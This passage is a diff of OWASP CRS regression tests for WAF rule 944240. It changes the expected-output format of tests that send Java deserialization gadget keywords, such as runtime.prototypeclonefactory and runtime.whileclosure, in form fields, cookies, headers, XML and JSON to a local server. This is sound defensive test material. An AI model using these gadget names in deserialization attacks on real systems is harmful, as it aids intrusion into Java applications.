runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 60 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 61 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 62 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 63 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 64 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - 
test_title: 944240-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 67 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 68 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log: + expect_ids: [944240] + - test_id: 69 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
Cookie: test=runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 70 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 71 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-72 + - 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 72 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 73 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 74 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 75 desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944240] + - 
test_id: 77 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 78 desc: "Argument test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" 
+ Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 79 desc: "Argument name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 80 desc: "Cookie test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 81 desc: "Cookie name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 82 desc: "Request header test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 83 desc: "XML attribute value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 84 desc: "XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 85 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 86 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
